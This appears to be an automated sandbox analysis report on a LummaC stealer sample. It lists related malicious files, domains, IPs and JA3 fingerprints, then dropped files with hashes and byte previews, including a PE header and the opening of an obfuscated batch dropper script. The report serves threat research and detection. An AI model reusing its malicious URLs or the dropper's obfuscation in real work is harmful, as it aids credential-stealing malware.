                                        List-4527768.xlsmGet hashmaliciousIcedIDBrowse
                                        • astrocycle.download/
                                        HRcontacts7752205.xlsmGet hashmaliciousIcedIDBrowse
                                        • astrocycle.download/
                                        sbf0127365-7431059.xlsmGet hashmaliciousIcedIDBrowse
                                        • astrocycle.download/
                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousIcedIDBrowse
                                        • astrocycle.download/
                                        DeliveryConf535215.xlsmGet hashmaliciousIcedIDBrowse
                                        • astrocycle.download/
                                        172.67.75.40zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                        • arc-gym.com.cutestat.com/wp-login.php

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        rentry.coFull-Setup.exeGet hashmaliciousLummaCBrowse
                                        • 104.26.3.16
                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                        • 172.67.75.40
                                        taskhost.exeGet hashmaliciousXWormBrowse
                                        • 104.26.2.16
                                        file.ps1Get hashmaliciousLummaC StealerBrowse
                                        • 104.26.3.16
                                        bUAmCazc.ps1Get hashmaliciousLummaC StealerBrowse
                                        • 104.26.2.16
                                        IaslcsMo.ps1Get hashmaliciousLummaC StealerBrowse
                                        • 172.67.75.40
                                        IaslcsMo.txt.ps1Get hashmaliciousLummaC StealerBrowse
                                        • 172.67.75.40
                                        owuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        • 172.67.75.40
                                        gkzHdqfg.ps1Get hashmaliciousLummaC StealerBrowse
                                        • 172.67.75.40
                                        xaSPJNbl.ps1Get hashmaliciousLummaCBrowse
                                        • 172.67.75.40

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUS!Setup.exeGet hashmaliciousLummaC StealerBrowse
                                        • 104.26.3.16
                                        ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 104.21.38.84
                                        FB.htmlGet hashmaliciousUnknownBrowse
                                        • 104.17.25.14
                                        http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfhGet hashmaliciousUnknownBrowse
                                        • 104.26.9.163
                                        http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                        • 104.17.25.14
                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.87.112
                                        test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 104.21.34.5
                                        iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.86
                                        SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.2.51
                                        oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.86
                                        CLOUDFLARENETUS!Setup.exeGet hashmaliciousLummaC StealerBrowse
                                        • 104.26.3.16
                                        ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 104.21.38.84
                                        FB.htmlGet hashmaliciousUnknownBrowse
                                        • 104.17.25.14
                                        http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfhGet hashmaliciousUnknownBrowse
                                        • 104.26.9.163
                                        http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                        • 104.17.25.14
                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.87.112
                                        test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 104.21.34.5
                                        iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.86
                                        SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.2.51
                                        oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.86

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        a0e9f5d64349fb13191bc781f81f42e1!Setup.exeGet hashmaliciousLummaC StealerBrowse
                                        • 172.67.213.115
                                        • 172.67.75.40
                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.213.115
                                        • 172.67.75.40
                                        iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.213.115
                                        • 172.67.75.40
                                        SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.213.115
                                        • 172.67.75.40
                                        oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.213.115
                                        • 172.67.75.40
                                        MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.213.115
                                        • 172.67.75.40
                                        l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.213.115
                                        • 172.67.75.40
                                        SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.213.115
                                        • 172.67.75.40
                                        XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.213.115
                                        • 172.67.75.40
                                        GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.213.115
                                        • 172.67.75.40

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com!Setup.exeGet hashmaliciousLummaC StealerBrowse
                                          SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                            TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                                              j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                  vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                      BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                        installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                          SoftWare(1).exeGet hashmaliciousLummaCBrowse

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:modified
                                                            Size (bytes):947288
                                                            Entropy (8bit):6.630612696399572
                                                            Encrypted:false
                                                            SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                            MD5:62D09F076E6E0240548C2F837536A46A
                                                            SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                            SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                            SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: !Setup.exe, Detection: malicious, Browse
                                                            • Filename: SgMuuLxOCJ.exe, Detection: malicious, Browse
                                                            • Filename: TNyOrM6mIM.exe, Detection: malicious, Browse
                                                            • Filename: j2nLC29vCy.exe, Detection: malicious, Browse
                                                            • Filename: es5qBEFupj.exe, Detection: malicious, Browse
                                                            • Filename: vUcZzNWkKc.exe, Detection: malicious, Browse
                                                            • Filename: CLaYpUL3zw.exe, Detection: malicious, Browse
                                                            • Filename: BagsThroat.exe, Detection: malicious, Browse
                                                            • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                            • Filename: SoftWare(1).exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\V

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):496248
                                                            Entropy (8bit):7.999666539358623
                                                            Encrypted:true
                                                            SSDEEP:12288:PuuYPnblMBGjgrSn6caD4u0H2LKwAacxs8C4A9a44PknfCt9xK:GzPOt1caHq2SxVq94Pkf8K
                                                            MD5:11A18CA5A4EC415EE2E991A8A2EFA60A
                                                            SHA1:AD7F7F4763644158A7D1DC22A25D7FA3600AC91F
                                                            SHA-256:44A0272003274F673664E9EAC14FAE1BFC04DEBE7CB58A86A75E7C8D08033F20
                                                            SHA-512:EF4C89749A69680DD5476AADAB0F0A56F5530B0EDA13CB5C432BF608084F48D6968586AD8DB954A860A55C973C466E1DDE3157CEDD49BD47044368DEC750E2C6
                                                            Malicious:false
                                                            Preview:.az$Q..brYk..c\..5.1..#.h...;.o..*.L......o...ho...+?.>.....t...M..1.H1.9d.pi.....HtD...D....6...mr.6..>...7..(@.b.u..~EV...5.X..?B.}..5Q.V......AX..c...}..e..^.S...J.N?..'&H6..r.......,.v.>....(K...p....5..XJ.]...6...o#./.....r./..1.p.. awJ..[:.P...*.`..X.=A....$}...s%.v..8..T........7..P...s.l7....V.."g...6Rx....).......V.e.)d...RRg`.:..T..j`DE.B'........NI'....G.E........8...y.=...~.^(.f..B...i.y.@.......y*......].j.h....c..l1u..s..Rq...T<.].....g{.,sHq.s.Gb.....=.D...W..y..]..].G.L........f".8wF..$....(.I.I.*.\.1..u..*.......%....u..$.Ju.............q...Ad......B...S....Nw..e6z.~.z........".U...5...f..9.L./..la.P >z.B........0T..-.....B.3H. .y..Nd)/.n%...._ue...#0...|...0fg3..v.oX...^..%Tv...@}V.....|g...M.k.T._(....\..WXR...%....hO.....h.(.:!........|..$....(..Q....y......0!l.j...V.Q....:..\*+.&sU.q.R..l....>..~ .....t\.n.4s._...Z.,..1... ......y......K.8~...E.c>R.^z.@S..5...D.;...Q.........QY.v.....1.e....w..'.....-...(...Rn_..i

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Access

                                                            Download File
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):63488
                                                            Entropy (8bit):7.997218193561625
                                                            Encrypted:true
                                                            SSDEEP:1536:Bw4nxRC6h9dFUbZ+MsTogIPlC8aeu67NoURZDNMcI:HnxRpEbdWoxs8puuCaZD0
                                                            MD5:CFCFA68F88E27612AB83EA57018A850C
                                                            SHA1:B403391DD50F8F6DD090E7E0319B611D9BBD2874
                                                            SHA-256:C6A15A8FA80F99E5F34775677B74082A0946FCF2F10AD3827691059821F034F7
                                                            SHA-512:3B361BAF0F93B2F956BAB4EDB48E03A2AB06F2B61583E2A0D023B25C5D5E41A14074E2B7D007672CB63A8E44F25763649C847F338119B9E5FF203ED27AE98248
                                                            Malicious:false
                                                            Preview:..l?.G..d.SB.....E..v.Z._..d$t......'F..G8e...m..Ol.(.L~3[.....n..N...x.(;..W...t.........|..(a.>2.Y........,.C6..L..i&FN...%w%_.s.A....^.4..^..:a../..D>.. .`..#.......#N.,%A..-.{..&.......\v...??.b.f.EGf...$};r.o d@.6[....i...n6.k~.}O....KL.I[.=...H.tijY.I.`/...:j.j.7.....{.7.....@WQ......:....|..... ....L.....~-^.M..(......_hcwW...r.......E.U*(...e.&.H.....7..*.a{Y...U+|^.zH..1p..G.w...i]...6}...8.eB.E..x.O..K<........J;K"D.^..cA........n...4..,..tC..1...Q.e.D.9.........k...H...&FeT..5Xd.p..".0..u.?....2t.%../. ..'A$.1...`....S(..P.>.....-...-7...<.*..2.7;.GyJy..K...L..0.j._b...-iv..Px<5y4(.DEt....u!.b>.)......%G{..}.~...lZ...a....e.nb.... w..nZ.4..NB.g."..`..Z.<)..Y..s..._.&..no. ..f4>.'....XO...QKo#&...'......%..Y.;.&....d.S'..'..#.5b.....Q..q.~.7.O.]...Ynk...>..X.[.P..J....g.....f..n.t.z...R.......9ZD.T....,..V.K.w....A.}1...t....c.8W..8.CC-....r....}....Nd.]7.2..v......... /...ZP.STM;..aT[...^....gP%.aE.h..'.=&.)u..&.=...3.hjq

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Availability

                                                            Download File
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):71680
                                                            Entropy (8bit):7.9976781651176445
                                                            Encrypted:true
                                                            SSDEEP:1536:cqVGA8XmJWQDjDhD3rvvbIRdb5gOY4kb+HUjnhM//6AiaPynUZTPb2RZU:c+X8XCdDjVD37v0RwOY4kiWnhM36iPSy
                                                            MD5:32795C14E61648316037781CC1BA12C5
                                                            SHA1:4CA7E78E840E12EE1EC390C3996E1C75EFC5A248
                                                            SHA-256:9E938A13061086921E0961EF7D2F0A89A6B2B33E9D21A1EEC0198D878DF4E536
                                                            SHA-512:3A526AE9C35EE67F5AE951CEB927B8B2CE61EA4B03BEB5ECB941353CE6343A007857160DB689587EC34F712E7C9BC06918454DE73E3792F1F75CB671174BA35E
                                                            Malicious:false
                                                            Preview:l[u.....W.r:3..T...N_.......1..e.O..M....u..Pp.^>...1:.gJC.=...g..C..C.@Y"w)0..aCq.dO.K.h.X4:....r...q......}.{o...p.....n..Z0.d#1.[.........P.n.1.\!W.....;.%.fz9j.2E....6{....G...'X.......=....a.\..t....C.i>=..,...<@\$....[=Qp.c...6._.e......K.......hCS......1..J.q4.MJC...K..-P.LN.C..(.[o......t:G.....S.!...^B..P.=.u_..".oim..'a^X..FYjq..)......'...W"...h...^..XvE.g...C.....W..`.>.......P#..o-m[..}M......g..g..B.-.wS..M)s.....a..(..R..!.06.|N0...P.p.d.iP..0....g.J.B%e.)......d.d...~....2.......k.....J4H?........]..].G.y.WS!......3..)yw...|...T.-..&.q....?..OKk9"......Q@.qN..ZP...h.}..=... ...K.c.7.2Q.@.a....'...24.p.. ....m.T....."..L.{v..A. ....Z..@...G.....S......B.|.._4....Y.O.I..+/..^w.{.%..`.?......P..e......~.S....*.....{,..EQ..yA...-~...E.U^.($!"..!g...r.>....k...&..:T..._..~..Y.TQ.k'..$...g.W."~..qZ....T3...`...e..._...E.J%.'...T../&.2.L..WU........ I..]........l.......5.N0....g_...7.l.0..#...1...\.Z.k%th_.;.Y.....77..&.M...x..

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Available

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):56320
                                                            Entropy (8bit):6.652049318870944
                                                            Encrypted:false
                                                            SSDEEP:1536:QUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoU:Xnj0nEoXnmowS2u5hVOoU
                                                            MD5:64ACFD91F0FC989008A694B9F199A57B
                                                            SHA1:8E4E37288AC01A2F48FDF059A0CFC5135C935C17
                                                            SHA-256:6B0C1BB5546B6682CCE559D06DCA34D43A5208C30CEB0DCC18014E45F844E4B8
                                                            SHA-512:02ADE9009A4D732A82E3708374A4CD80319DD6F19AF67841D8246EA7BDD7BA6BEFDE911B9DA8BE9AC9929D12DE4EB8ED69AC965FC795293449E4545281A7F30D
                                                            Malicious:false
                                                            Preview:.....#....u..=L.I...M.Q.Q...B.M......Y........9].].tE.E..t>3...t8.E.PV.u.....I..........M...A.PQj.j.S..x.I.........F;u.r..u...p.Vj...t.I.P..p.I....}.........u..G.f.w.P.u...L.I.P..P.I...tl.u..e......F....F..G....G...G.PWj.j.S..x.I...t=.E....@.E....r.u.j.Sj.V..|.I...t.V.E.P.u.....I...t..E.....].u..}...=x.I.t..u.j...t.I.P...t.Vj...t.I.P...t.Sj...t.I.P..E..t.Pj...t.I.P..E._^[....U..E.SV.u...WVj..0j.S..d.I.....u6..0.I...zu).6j...t.I.P..p.I..M.....t.V.6Pj.S..d.I....._^...[].U..E.SV.u...WVj..0j.S..d.I.....u6..0.I...zu).6j...t.I.P..p.I..M.....t.V.6Pj.S..d.I....._^...[].SVW..3.j.[._..w......G.3..........Q....Y..9w.v......P.M....F;w.r.._^[...V..~..t.3.PPP.v.P.v...0.I.j..v......YY.v...`.I..6.B...Y^.U..QSV.u....M...WVj..1.E.SP....I.....u7..0.I...zu*.6j...t.I.P..p.I..M.....t.V.6PS.u.....I....._^...[..SVW...Sj.3...t.I.P..p.I.....t.j.SP..,.I....._^...[.U..VW.u...3.j...t.I.P..p.I.....t.j.P..(.I....._...^].U....SQQ.M......M.......t..z.....t.....2.M........[..U...dSVWQQ.M..`...Q.

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Balanced

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):143360
                                                            Entropy (8bit):6.659217298088009
                                                            Encrypted:false
                                                            SSDEEP:3072:h0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNP:IbfSCOMVIPPL/sZ7HS3zcNP
                                                            MD5:89B5A26508E16E2564552AE664E91B66
                                                            SHA1:9851FFCBE0015AA2210070E84D7058EA73EC84E4
                                                            SHA-256:EAAF46C77B4F4F937A620D807D58D60882A0310978DBFFC32D469CB025DD45E1
                                                            SHA-512:B5D1CCCC6C632D0138AAE3A6058BEBDDE6811F5CFCA986E36E790F690C7630E7B257E8C6680CE0A7A6A52D3C18CF395634BE5A96B66BE46C9A6A55BB1D35EF91
                                                            Malicious:false
                                                            Preview:..1...Y..x.=....s.... GJ.].3.]..U..U.V..u.....j.^.0.C.........}..v.M......~.....3.@9E.w..l...j"..u...t.S.Z...W.~...0..~.....t.G...0..@I....Z......x..?5|.....0H.89t....:1u..F.....q...A..u.+.A.PSR.EB....._3.[^]..V..V..,.......Y<.u..F....V.R,..Y.F....^..U...d......L.3.E.S.]...l...VW.}..................u.3...........-u...............3.._....}.u"..........u.......h.gJ..`........E.P.\X..Y..t........A.....................................z....E.........|....@.}..u..E........................%.......u...3...2.....3.................3............@...............+..QQ..$....YY..:........=....t.=....u.3.........0...3....4......C..,..................j.^...............;.......3.......;..0...............u.....3........j Y+......3....@..............6.........H...............t.A..3.j X+..V.9................s...........su...t.....2.................jrY;.r..........................0.........+.........;.rm;.s..8..3..F.;.s........@...3.#.....#.........................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Bids

                                                            Download File
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64512
                                                            Entropy (8bit):7.997169431224249
                                                            Encrypted:true
                                                            SSDEEP:1536:oSpmDzqM+54CRjeXU/4xbDjuNUAZy5NH+VOxI4+sdW1g:oSazq54CGUYbD6NXM5NegS45ig
                                                            MD5:464B43F4D2DF8DF1A0D420A378B13284
                                                            SHA1:0C90A0656812B3EF827D920195C5C36841AE17AE
                                                            SHA-256:F0E44F93299CCE792814297DC2A34082B057FFCFBD7320C32B16598367A115E8
                                                            SHA-512:2D07B7C972873D397A9E4A16478C73C864F9C82D86D8EE8EE820BDED709CA3EE6B2C1E709DB52B01A131ED0BFF4881BC922D0BCFDEA512EE02D8A0513E7F1E26
                                                            Malicious:false
                                                            Preview:.az$Q..brYk..c\..5.1..#.h...;.o..*.L......o...ho...+?.>.....t...M..1.H1.9d.pi.....HtD...D....6...mr.6..>...7..(@.b.u..~EV...5.X..?B.}..5Q.V......AX..c...}..e..^.S...J.N?..'&H6..r.......,.v.>....(K...p....5..XJ.]...6...o#./.....r./..1.p.. awJ..[:.P...*.`..X.=A....$}...s%.v..8..T........7..P...s.l7....V.."g...6Rx....).......V.e.)d...RRg`.:..T..j`DE.B'........NI'....G.E........8...y.=...~.^(.f..B...i.y.@.......y*......].j.h....c..l1u..s..Rq...T<.].....g{.,sHq.s.Gb.....=.D...W..y..]..].G.L........f".8wF..$....(.I.I.*.\.1..u..*.......%....u..$.Ju.............q...Ad......B...S....Nw..e6z.~.z........".U...5...f..9.L./..la.P >z.B........0T..-.....B.3H. .y..Nd)/.n%...._ue...#0...|...0fg3..v.oX...^..%Tv...@}V.....|g...M.k.T._(....\..WXR...%....hO.....h.(.:!........|..$....(..Q....y......0!l.j...V.Q....:..\*+.&sU.q.R..l....>..~ .....t\.n.4s._...Z.,..1... ......y......K.8~...E.c>R.^z.@S..5...D.;...Q.........QY.v.....1.e....w..'.....-...(...Rn_..i

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Campaigns

                                                            Download File
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:ASCII text, with very long lines (1359), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):22954
                                                            Entropy (8bit):5.07401746558717
                                                            Encrypted:false
                                                            SSDEEP:384:aGf05c6NMXKObw2tlbZqfiqViJYS94QBvO51PKmPb3i32jRsHEWF4Yh:aMpKObhl1qKm0p9rPmG2KFV
                                                            MD5:2E7B0022580A56F4A6645D751E977BC1
                                                            SHA1:5F9942E6359BFEA8EA1407F69DFED3C308551238
                                                            SHA-256:3D616D0119732BF2780AF373845A9F8F1C50AED7CEA51D54E0E790FFEC75280E
                                                            SHA-512:8887FE072570E5EDF9987F4FA01B115322D0BE0F7D3265911C91CF3DECC8370DF79BC5E09F5AA30E749A8299B313C1C3B4F7F79647C82D55B218D7171961CDAE
                                                            Malicious:false
                                                            Preview:Set Korean=c..ufDetermined-Capabilities-Mechanics-Tim-Cruise-..qcVTopless-Clinical-Erp-Handled-Barn-Tub-..pqEaster-Convenience-..LjlvAdventures-Competitors-Unions-Sl-..vLAccording-Ben-Lean-Avg-Lyric-Completely-Urls-..QCTrap-Simulation-Download-Intelligent-Upgrades-Bunny-Bond-Citizen-..oRAlerts-Came-Necessity-Grateful-Raises-Opponents-Belgium-..TJsVPlaced-Unusual-Personals-Blind-Disks-Urban-Terrible-Precious-Funding-..Set Combined=G..ekvLDescriptions-Cet-Continent-House-Booty-..LMfgTit-Therapeutic-Airline-William-Fiscal-..vzSgReceipt-Ho-..tLCattle-Receipt-Appearance-Retention-Involve-Breeds-Fragrances-Bookings-Al-..YAmvStuck-..Set Laura=t..GUxGc-Recruiting-Switch-Impact-Briefs-Sticks-Radius-Selection-..PZpCombinations-Cialis-Allocation-Camera-Periods-Wt-Words-..xCyRequested-Harmony-Reasonably-Supply-Boy-Political-Lucia-..oseTGray-..BeeFEva-..fJFarmer-Vp-Toilet-Hair-Complications-Writes-Compete-..IabZFlooring-Brussels-Indonesian-Deluxe-Millennium-Spending-Bradford-Child-Beds-..pbFavourit

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Campaigns.cmd (copy)

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:ASCII text, with very long lines (1359), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):22954
                                                            Entropy (8bit):5.07401746558717
                                                            Encrypted:false
                                                            SSDEEP:384:aGf05c6NMXKObw2tlbZqfiqViJYS94QBvO51PKmPb3i32jRsHEWF4Yh:aMpKObhl1qKm0p9rPmG2KFV
                                                            MD5:2E7B0022580A56F4A6645D751E977BC1
                                                            SHA1:5F9942E6359BFEA8EA1407F69DFED3C308551238
                                                            SHA-256:3D616D0119732BF2780AF373845A9F8F1C50AED7CEA51D54E0E790FFEC75280E
                                                            SHA-512:8887FE072570E5EDF9987F4FA01B115322D0BE0F7D3265911C91CF3DECC8370DF79BC5E09F5AA30E749A8299B313C1C3B4F7F79647C82D55B218D7171961CDAE
                                                            Malicious:false
                                                            Preview:Set Korean=c..ufDetermined-Capabilities-Mechanics-Tim-Cruise-..qcVTopless-Clinical-Erp-Handled-Barn-Tub-..pqEaster-Convenience-..LjlvAdventures-Competitors-Unions-Sl-..vLAccording-Ben-Lean-Avg-Lyric-Completely-Urls-..QCTrap-Simulation-Download-Intelligent-Upgrades-Bunny-Bond-Citizen-..oRAlerts-Came-Necessity-Grateful-Raises-Opponents-Belgium-..TJsVPlaced-Unusual-Personals-Blind-Disks-Urban-Terrible-Precious-Funding-..Set Combined=G..ekvLDescriptions-Cet-Continent-House-Booty-..LMfgTit-Therapeutic-Airline-William-Fiscal-..vzSgReceipt-Ho-..tLCattle-Receipt-Appearance-Retention-Involve-Breeds-Fragrances-Bookings-Al-..YAmvStuck-..Set Laura=t..GUxGc-Recruiting-Switch-Impact-Briefs-Sticks-Radius-Selection-..PZpCombinations-Cialis-Allocation-Camera-Periods-Wt-Words-..xCyRequested-Harmony-Reasonably-Supply-Boy-Political-Lucia-..oseTGray-..BeeFEva-..fJFarmer-Vp-Toilet-Hair-Complications-Writes-Compete-..IabZFlooring-Brussels-Indonesian-Deluxe-Millennium-Spending-Bradford-Child-Beds-..pbFavourit

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ceo

                                                            Download File
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):59392
                                                            Entropy (8bit):7.996488555959393
                                                            Encrypted:true
                                                            SSDEEP:768:tJd3kcvzRbRlQP1WfW3xYgUdShSaLH4MyeoZGZkM1jufMxT6dZrdJ3:XRPq1WfoJ0abByT2ksjKQT6dZrdV
                                                            MD5:7D627757A86D54CD1B6C057A7DBFCF26
                                                            SHA1:3A73D88A63ED284DDD76305A4D91DEB9275C4C39
                                                            SHA-256:3AAF7017767A1A1FBB1D9A80FA2C5B3C05583D879BE0A0E2F32898076A4D3BA7
                                                            SHA-512:4B43BAB09367F06C762E2BC60ED3452E05C7001B83198C6732BB68C146DECBE6C837891F597092DFE00565B895933ED94EB665AAC6A1CD4A49E9E26EED65986F
                                                            Malicious:false
                                                            Preview:..Y.Jj.8\.. K2..%....f.OP_.3.Yl..d.[....._............L..x..7a5oc@.3..UX=.v. ....R.v.......x..........\.A.)U@...T.l...l..>...n../V.(L...q?.Q".4.6|D...I.\.yL..i.q...h....!..,..?p.....yR.... ..&.b..g..L..IpC..u.."....9..=.-|...B1.).$...6.H'....?_7.*..dkQ.W......1....mps..Vp.D4U.T.....c.B.bH[!.\...!..!}.o.d..l3).......t....W.qc.I..(v....o.b.._r.k#,..).....B@K%.x......hL..w.~....Oo..U5...'...I.@...Qm.......$..I......A..Z.j#..h>6T....cX.`qUB8..<2......Zq1....TG....Fh.=T)).~....]J.......A.G.w}W.&T9..Z@.~.....G.$..........g8........q.p........>..P.....Tv@...g..53.........@...z........|.C&;...S...e.G\u.F..w.fB|.@;O.....6....A...f......+....P.-..i..ey..bi...c`zV..0.......qo*!.q..i..{AU...5..l.`..G.?>r8:..]..R&..,.ZR3F..0.....C}...\...R........t..Oc...V....'`.n8......h.X.`.D..AU..E.P...tP.....&?.e./I.Q....M~.....{K..PD%.u..M]l.;w.....j...W.22..0.n..rl..v.T.....#.m....{...o8..}.D1...a.......2..5..V.)r.v'wl..F...k..@)..u...m....d..$.....qV8.hg..

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Designed

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):79872
                                                            Entropy (8bit):6.679021710164866
                                                            Encrypted:false
                                                            SSDEEP:1536:S64qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4CxiL:J4qv+32eOyKODOSpQSAU4CI
                                                            MD5:7D1725A7C164AD387FBA5007E60E47A7
                                                            SHA1:C4253D862DFDBDB7EAE80F88E5487487E72C9AD4
                                                            SHA-256:03CDD5BDCB6EBCB6CFDB7D5C3A038C1BEACA34FC9C8FBB717BC85F31BBDB797A
                                                            SHA-512:7368DF3D1AF7DE8CA3074ABCE8AB02C6DCD309F9B6818C6ACD4AEBB72985B64253AC66A74E424FDC317CF1B07108616C4636826393707109E2377B4586BEA4DE
                                                            Malicious:false
                                                            Preview:8M.........]..U...,......L.3.E..M.3.SVW8A..}..........H......................y.3.G...;.r......W..........+.+...............3.......3.......3..,...............;.u....k..............7.................3.3....;...0..........0......F..;.u.......,.....tL..ss....0.....,...@..,....1...............,....j.P..0...h....P.("....,..........................3..t.3....0.....B....,.........;.u..tZ..ss....0.....,...C........,....?...............,....j.P..0...h....P.!....,..........................3.3............k....AG............;.................3.j.Y.......................&v.j&X....N!J...4.O!J............W..1............j.P.t.......P..........L!J....H.J.P........P.o_........3.A...;...............u.3.........,...P..........;.u.........t.3.3......0........0......G..;.u..tO..,.....ss....0.....,...C..,....43............SP..0.....,...h....P.. ...../.....,......+...;.........0..........,......P......P..0...SP........3...u.P........,.........PS.......,...@......;...............3.3......

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dir

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):119808
                                                            Entropy (8bit):6.588797342871174
                                                            Encrypted:false
                                                            SSDEEP:3072:N7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOm:56AUkB0CThp6vmVnjphfhnS
